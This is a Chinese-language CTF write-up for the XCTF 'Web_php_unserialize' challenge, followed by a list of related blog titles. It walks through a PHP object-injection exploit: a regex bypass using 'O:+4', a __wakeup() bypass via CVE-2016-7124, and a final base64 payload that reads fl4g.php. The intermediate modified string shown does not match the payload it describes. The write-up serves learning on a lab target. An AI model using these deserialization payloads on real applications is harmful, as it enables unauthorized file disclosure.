Web_php_unserialize,XCTF-Web_php_unserialize
题目
题目如下 可以看出来这是一道关于反序列化的题目
分析题目
看一下题目的代码
首先判断GET参数 “var” 是否存在,然后通过base64解码传入变量var,如果不存在就输出网页源码对var进行一个正则过滤,如果通过正则过滤便会进行反序列化,否则响应信息’stop hacking!’
题目中出现的魔术方法
题目中存在一个demo类
__contrust() 见名知意,构造方法。具有构造方法的类会在每次创建新对象前调用此方法 ,该方法常用于完成一些初始化工作。__destruct() 析构方法 ,当 某个对象的所有引用都被删除或者当对象被显式销毁时 , 析构函数会被执行。__wakeup() 是用在反序列化操作中。unserialize() 会检查存在一个 __wakeup() 方法。如果存在,则先会调用 __wakeup() 方法。 __wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作。
解题思路
通过GET传入base64编码得参数且要绕过正则过滤绕过 __wakeup() 解释,源码中提示flag在 fl4g.php 中,而使用调用 __wakeup() 会强制将 $file 变量复制为index.php
开始解题
序列化
代码如下
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
}
}
$a = new Demo('fl4g.php');
$b = serialize($a);
echo $b;
?>
运行后结果如下
O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
绕过正则
该题正则匹配的规则如下: 在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 , 那么就被过滤。 我们传入得参数类型为对象 " O " , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 " O:4 " 这样的字符串肯定无法通过正则匹配 这里利用了一个php反序列化的特性(感兴趣可以自行百度),需要注意的是在php7中这部分代码被修改了,无法使用。
获取php版本
使用dirsearch进行扫描 可以找到泄露的PHP信息
利用特性
反序列化操作 参数格式:参数名长度 时,当格式为 参数格式:+参数名长度 会返回同样的结果,故我们可以通过这个方法绕过正则过滤
O:+4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
绕过__wakeup()
对应的CVE编号: CVE-2016-7124
存在漏洞的PHP版本: PHP5.6.25 之前版本和 7.0.10 之前的7.x版本漏洞概述: __wakeup() 魔法函数被绕过,导致执行了一些非预期效果的漏洞漏洞原理: 当对象的 属性(变量)数 大于实际的个数时, __wakeup() 魔法函数被绕过
故序列化结果修改如下
O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
构造payload
题目中知道还需要进行base64编码 构造payload如下
?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
得到flag
注意点
需要注意的一点是private和protect属性的序列化
直接上代码
class test{
public $name="winny";
private $age="8";
protected $sex="female";
}
$a=new test();
$a=serialize($a);
print_r($a);
?>
序列化显示如下
O:4:"test":3:{s:4:"name";s:5:"winny";s:9:"testage";s:1:"8";s:6:"*sex";s:6:"female";}
private 分析: 这样就发现本来是 age结果上面出现的是 testage,而且 testage 长度为7,但是上面显示的是9 查找资料后发现 private 属性序列化的时候格式是 %00类名%00成员名,%00 占一个字节长度,所以 age 加了类名后变成了 testage 长度为9 protect 分析: 本来是 sex 结果上面出现的是 *sex,而且 *sex 的长度是4,但是上面显示的是6,同样查找资料后发现 protect属性序列化的时候格式是 %00*%00成员名
public(公共的):在本类内部、外部类、子类都可以访问 protect(受保护的):只有本类或子类或父类中可以访问 private(私人的):只有本类内部可以使用
这里我开始是采用手动序列化,一直没有成功。本菜狗还是使用脚本输出吧呜呜呜。
Web_php_unserialize,XCTF-Web_php_unserialize相关推荐
- 【愚公系列】2023年05月 攻防世界-Web(Web_php_unserialize)
文章目录 前言 一.Web_php_unserialize 1.题目 2.答题 前言 PHP的序列化漏洞是一种安全漏洞,攻击者可以利用这种漏洞来执行恶意代码或获取敏感信息.具体来说,攻击者可以通过在序 ...
- XCTF-高手进阶区:Web_php_unserialize(详解)
代码审计: <?php class Demo { private $file = 'index.php';public function __construct($file) { $this-& ...
- 长亭php反序列化防护_CTF-攻防世界-Web_php_unserialize(PHP反序列化)
题目 解题过程 PHP反序列化的一道题,从代码看出flage在fl4g.php这个文件里面,Demo类的构造方法可以传入文件名.把Demo的代码贴到本地做一下序列化 classDemo {privat ...
- XCTF 攻防世界 web 高手进阶区
文章目录 ics-07 shrine( flask + jinja2 的 SSTI) easytornado(模板注入) upload(文件名注入) supersqli(堆叠注入) php_rce(T ...
- XCTF联赛“出海计划”开启,八月新加坡站国际赛蓄势待发
作为目前全国最高技术水平和最具影响力的网络安全技术对抗赛事,8月24日-25日,XCTF联赛将联合亚洲地区历史最悠久.影响面最广的安全大会HITBSecConf,在新加坡举办HITB GSEC CTF ...
- 【偶尔一道ctf】xctf adword mobile easy-apk
最近在学习ctf,偶尔会做一些ctf题,打算记录下做题的步骤和思路,打算学习ctf的小白可以跟着一起动手学习.本题是安卓题目. 题目apk下载地址 https://adworld.xctf.org.c ...
- XCTF WEB simple_php
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5072 题解: 掌握php弱类型比较 ...
- XCTF WEB simple_js
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5067 题解: F12查看网页源代码 ...
- XCTF WEB command_execution
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5071 题解: windows或li ...
- XCTF WEB webshell
https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=0&id=5070 版本一 题解:修改HTML代 ...
最新文章
- 21岁华人本科生,凭什么拿下CVPR 2020最佳论文提名?
- nginx 错误502 upstream sent too big header while reading response header from upst
- 【转】python2与python3的主要区别
- 速读训练软件_记忆力训练:如何提高注意力呢?
- DEV GridControl ID相同的行显示相同的颜色(当ID的值不确定时)
- markdown 语法_markdown特殊语法之上下标
- Pandas 读写数据
- 性能测试工具 wrk 安装与使用
- vue-cli中的babel配置文件.babelrc详解
- 单片机的c语言程序设计与应用课后答案,单片机的C语言程序设计与应用——基于Proteus仿真(第3版)...
- AC上网行为管理(深信服)
- SpringBoot中调用第三方接口的三种方式
- BaseRecyclerViewAdapterHelper开源项目之BaseSectionQuickAdapter 实现Expandable And collapse效果的源码学习...
- 163个人邮箱注册申请流程,公司邮箱怎么注册?
- Java tif转jpg代码实现
- (很容易懂,你把代码复制粘贴即可解决问题)高等代数/线性代数-基于python实现矩阵法求解齐次方程组
- 现货黄金的点差费用是怎么收的
- 同城跑腿微信小程序制作步骤_分享下同城跑腿小程序的作用
- 编写函数求区间[200,3000]中所有的回文数, 回文数是正读和反读都是一样的数
- php 许愿墙 阶段案例_许愿墙代码